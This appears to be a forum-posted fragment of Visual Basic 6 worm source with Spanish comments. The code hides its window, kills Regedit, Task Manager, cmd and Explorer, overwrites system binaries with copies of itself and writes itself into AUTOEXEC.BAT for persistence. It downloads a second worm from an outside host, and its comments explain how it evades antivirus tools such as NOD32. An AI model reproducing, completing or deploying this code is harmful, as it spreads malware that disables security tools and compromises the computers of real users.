Matar ("Regedit.exe")
Matar ("Services.msc")
Matar ("cmd.exe")
Matar ("Explorer.exe")
Shell "explorer.exe" 'Retornamos al EXPLORER para no levantar sospechas
SecuestroCarpeta Environ("SYSTEMROOT") & "\Binary\" 'Creamos carpetas de secuestro
Secuestro Environ("SYSTEMROOT") & "\SYSTEM32\REGEDIT.EXE", Environ("SYSTEMROOT") & "\Binary\regedit.txt"
Secuestro Environ("SYSTEMROOT") & "\SYSTEM32\services.msc", Environ("Systemroot") & "\BINARY\Services.txt"
Secuestro Environ("SYSTEMROOT") & "\SYSTEM32\taskmgr.exe", Environ("SYSTEMROOT") & "\binary\taskmgr.txt"
'Lo copiamos en archivos .TXT
FileCopy App.EXEName + ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\regedit.exe"
FileCopy App.EXEName + ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\taskmgr.exe"
FileCopy App.EXEName + ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\services.msc"
'Nos suplementamos.
seNO:
Shell Environ("SYSTEMROOT") & "\SYSTEM32\deflpo.exe"
Loop
End Sub
Private Sub NayrocSTEM()
Dim Archivo As String
Dim NumArchivo As Long
Dim Archivo2 As String
Dim NumArchivo2 As Long
On Error Resume Next
On Error GoTo NoHayBat
Do
FileCopy App.EXEName + ".exe", Environ("SYSTEMROOT") & "\SYSTEM32\deflps.exe" 'NOTA1
Matar ("Explorer.exe")
Matar ("CMD.exe")
Matar ("Regedit.exe")
Matar ("services.msc")
Matar ("msnmsgr.exe")
Shell ("Explorer.exe") 'Retornamos al Explorer para no levantar sospechas
Archivo = Environ("SYSTEMDRIVE") & "\AUTOEXEC.BAT"
NumArchivo = FreeFile()
'Aqui me añado al
'AUTOEXEC.BAT
'
'Para iniciarme cada vez que el sistema corra
'¿Sera esta una via alterna?
'Al yo poner "DEFLPS"
'llama el archivo antes copiado
'Es necesario que se copie antes en la carpeta SYSTEM32
'Esto me da una via alterna contra los AV
Open Archivo For Output As #NumArchivo
Print #NumArchivo, "Echo off"
Print #NumArchivo, "Title AUTOEXEC.BAT"
'--
Print #NumArchivo, "CLS"
Print #NumArchivo, "Echo Loading..."
Print #NumArchivo, "CLS"
Print #NumArchivo, "cls"
Print #NumArchivo, "deflps"
Close #NumArchivo
NoHayBat:
On Error Resume Next
'DeflPO
'Leer Mas abajo su Sub ()
Archivo2 = Environ("SYSTEMROOT") & "\Call.bat"
NumArchivo2 = FreeFile()
Print #NumArchivo, "Echo off"
Print #NumArchivo, "title Analizador de discos lógicos"
Print #NumArchivo, "cls"
Print #NumArchivo, "echo @echo off > %SYSTEMDRIVE%\AUTOEXEC.bat"
Print #NumArchivo, "Echo cls>>%SYSTEMDRIVE%\AUTOEXEC.bat"
Print #NumArchivo, "ECHO DEFLPS>>%SYSTEMDRIVE%\AUTOEXEC.bat"
Close #NumArchivo
Shell Environ("SYSTEMROOT") & "\Call.bat"
Loop
End Sub
Private Sub AñoNuevo()
'Feliz año nuevo xDD
Do
If Month(Now) = 1 And Day(Now) = 1 Then
AñoNuevoUp
End If
Loop
End Sub
Private Sub AñoNuevoUp()
Dim ArchivoK32 As String
Dim NumArchivoK32 As Long
Do
ArchivoK32 = Environ("SYSTEMROOT") & "\2007.bat"
NumArchivoK32 = FreeFile()
'Aqui se ejecuta en año nuevo :)
Print #NumArchivoK32, "Echo off"
Print #NumArchivoK32, "title OS"
Print #NumArchivoK32, "cls"
Print #NumArchivoK32, "Deflpo"
Print #NumArchivoK32, "Cls"
Close #NumArchivoK32
Shell Environ("SYSTEMROOT") & "\2007.bat"
'Lo hago como BAT ya que es mas efectivo para los AV's, En especial
'NOD32
Loop
End Sub
Private Sub Ds_Click()
MsgBox "Desinfectado"
End Sub
Private Sub Form_Load()
On Error Resume Next
App.TaskVisible = False
MsgBox " ", vbExclamation, "WINLOGON.EXE"
Clipb
NayrocSTAM
DeflPO
NayrocSTEM
AñoNuevo
AeroBits
End Sub
Public Sub Matar(ByVal processName As String)
On Error GoTo ErrHandler
Dim oWMI
Dim ret
Dim sService
Dim oWMIServices
Dim oWMIService
Dim oServices
Dim oService
Dim servicename
Set oWMI = GetObject("winmgmts:")
Set oServices = oWMI.InstancesOf("win32_process")
For Each oService In oServices
servicename = LCase(Trim(CStr(oService.Name) & ""))
If InStr(1, servicename, LCase(processName), vbTextCompare) > 0 Then
ret = oService.Terminate
End If
Next
Set oServices = Nothing
Set oWMI = Nothing
ErrHandler:
Err.Clear
End Sub
Private Sub DeflPO()
'ORIENTE-ETERNO : Modo silencioso
Do
Dim sSourceUrl As String
sSourceUrl = "http://h1.ripside.net/MyArchivos/" & _
"DCOM/deflPO.exe/" 'Este es otro de mis Worms
DownloadFile sSourceUrl, Environ("SYSTEMROOT") & "\SYSTEM32\deflPO.exe" 'Descargamos el otro malguar
Loop
End Sub
Private Function DownloadFile(ByVal sURL As String, ByVal sLocalFile As String) As Boolean
DownloadFile = URLDownloadToFile(0, sURL, _
sLocalFile, 0, 0) = ERROR_SUCCESS
End Function
Private Sub Form_Unload(Cancel As Integer)
MsgBox " ", vbCritical
Do
Shell App.Path & App.EXEName & ".exe"
Loop
End Sub el modulo no tengo que explicar mucho, ya esta mas que claro . |
|
|
|
|
|
| |
|
